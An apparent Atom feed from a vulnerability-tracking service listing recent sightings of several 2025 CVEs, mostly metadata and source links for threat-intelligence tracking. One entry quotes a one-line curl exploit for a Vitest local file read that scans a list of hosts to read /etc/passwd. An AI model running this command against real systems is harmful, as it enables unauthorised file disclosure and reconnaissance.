<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://db.gcve.eu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-24T02:26:20.589974+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@gcve.eu</email>
  </author>
  <link href="https://db.gcve.eu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://db.gcve.eu/sighting/7e4ad252-0194-4b2f-9aaf-4a68f2650cfd/export</id>
    <title>7e4ad252-0194-4b2f-9aaf-4a68f2650cfd</title>
    <updated>2026-05-24T02:26:20.770707+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "7e4ad252-0194-4b2f-9aaf-4a68f2650cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1686", "content": "", "creation_timestamp": "2025-02-12T22:58:21.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/7e4ad252-0194-4b2f-9aaf-4a68f2650cfd/export"/>
    <published>2025-02-12T22:58:21+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/a7c55491-2c0e-47cd-804f-ecf7a50f7096/export</id>
    <title>a7c55491-2c0e-47cd-804f-ecf7a50f7096</title>
    <updated>2026-05-24T02:26:20.770660+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "a7c55491-2c0e-47cd-804f-ecf7a50f7096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "published-proof-of-concept", "source": "Telegram/2BvzDhkA_vypO7mGv4Hm3zZ8Jlh39uY-jml8MP6LdNmQUR4", "content": "", "creation_timestamp": "2025-02-19T18:00:38.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/a7c55491-2c0e-47cd-804f-ecf7a50f7096/export"/>
    <published>2025-02-19T18:00:38+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/cc530027-2de1-4459-a8aa-0c86c57a84dc/export</id>
    <title>cc530027-2de1-4459-a8aa-0c86c57a84dc</title>
    <updated>2026-05-24T02:26:20.770611+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "cc530027-2de1-4459-a8aa-0c86c57a84dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3likej7z4zu23", "content": "", "creation_timestamp": "2025-02-19T18:06:44.161397Z"}</content>
    <link href="https://db.gcve.eu/sighting/cc530027-2de1-4459-a8aa-0c86c57a84dc/export"/>
    <published>2025-02-19T18:06:44.161397+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/181de8ee-61ec-4d75-ad8d-35289f32791e/export</id>
    <title>181de8ee-61ec-4d75-ad8d-35289f32791e</title>
    <updated>2026-05-24T02:26:20.770556+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "181de8ee-61ec-4d75-ad8d-35289f32791e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://t.me/cvedetector/18456", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24965 - Crun Container Runtime File System Escalation Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24965 \nPublished : Feb. 19, 2025, 5:15 p.m. | 1\u00a0hour, 23\u00a0minutes ago \nDescription : crun is an open source OCI Container Runtime fully written in C. In affected versions A malicious container image could trick the krun handler into escaping the root filesystem, allowing file creation or modification on the host. No special permissions are needed, only the ability for the current user to write to the target file. The problem is fixed in crun 1.20 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-19T20:24:58.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/181de8ee-61ec-4d75-ad8d-35289f32791e/export"/>
    <published>2025-02-19T20:24:58+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/da814310-5953-483a-997d-0d44a43697b5/export</id>
    <title>da814310-5953-483a-997d-0d44a43697b5</title>
    <updated>2026-05-24T02:26:20.770500+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "da814310-5953-483a-997d-0d44a43697b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2496", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8994", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2496\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: N/A\n\ud83d\udccf Modified: 2025-03-26T22:16:00.685Z\n\ud83d\udd17 References:\nNo references available.", "creation_timestamp": "2025-03-26T22:25:30.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/da814310-5953-483a-997d-0d44a43697b5/export"/>
    <published>2025-03-26T22:25:30+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/6bb43849-4407-43a2-9025-1a6324c2f10a/export</id>
    <title>6bb43849-4407-43a2-9025-1a6324c2f10a</title>
    <updated>2026-05-24T02:26:20.770443+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "6bb43849-4407-43a2-9025-1a6324c2f10a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/7441", "content": "\ud83d\udea8 CVE-2025-24963 - Vitest Browser Mode Local File Read \ud83d\udea8\n\n\ud83d\udca5One Liner Exploit: \ncat file.txt | while read host; do curl -skL \"http://$host/__screenshot-error?file=/etc/passwd\" | grep -E \"root:.*:/bin/\" &amp;amp;&amp;amp; echo \"$host is VULN\"; done", "creation_timestamp": "2025-04-01T12:37:26.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/6bb43849-4407-43a2-9025-1a6324c2f10a/export"/>
    <published>2025-04-01T12:37:26+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/8b4900a1-3004-4afb-9627-58bb334963e8/export</id>
    <title>8b4900a1-3004-4afb-9627-58bb334963e8</title>
    <updated>2026-05-24T02:26:20.770390+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "8b4900a1-3004-4afb-9627-58bb334963e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "Telegram/m_VX8ITBtSBz-wC_458XeKLmc3TfY-HOZ02yPgCyfuW9sk0", "content": "", "creation_timestamp": "2025-04-23T21:00:07.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/8b4900a1-3004-4afb-9627-58bb334963e8/export"/>
    <published>2025-04-23T21:00:07+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/3537b937-3c52-4210-a1c9-c0bb2a9113b4/export</id>
    <title>3537b937-3c52-4210-a1c9-c0bb2a9113b4</title>
    <updated>2026-05-24T02:26:20.770333+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "3537b937-3c52-4210-a1c9-c0bb2a9113b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/114816361290443115", "content": "", "creation_timestamp": "2025-07-08T07:10:39.211284Z"}</content>
    <link href="https://db.gcve.eu/sighting/3537b937-3c52-4210-a1c9-c0bb2a9113b4/export"/>
    <published>2025-07-08T07:10:39.211284+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/77280682-3318-427d-b2bd-4f56ab073939/export</id>
    <title>77280682-3318-427d-b2bd-4f56ab073939</title>
    <updated>2026-05-24T02:26:20.770256+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "77280682-3318-427d-b2bd-4f56ab073939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://bsky.app/profile/certvde.infosec.exchange.ap.brid.gy/post/3ltgqoa3tmza2", "content": "", "creation_timestamp": "2025-07-08T07:10:49.247729Z"}</content>
    <link href="https://db.gcve.eu/sighting/77280682-3318-427d-b2bd-4f56ab073939/export"/>
    <published>2025-07-08T07:10:49.247729+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/dadf9031-c615-48ed-af6b-727651a6d07d/export</id>
    <title>dadf9031-c615-48ed-af6b-727651a6d07d</title>
    <updated>2026-05-24T02:26:20.769319+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "dadf9031-c615-48ed-af6b-727651a6d07d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24964", "type": "seen", "source": "https://gist.github.com/david-botelho-mariano/247f704f2e44a7aa42ab36e4b14f5a60", "content": "", "creation_timestamp": "2025-12-14T22:20:38.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/dadf9031-c615-48ed-af6b-727651a6d07d/export"/>
    <published>2025-12-14T22:20:38+00:00</published>
  </entry>
</feed>
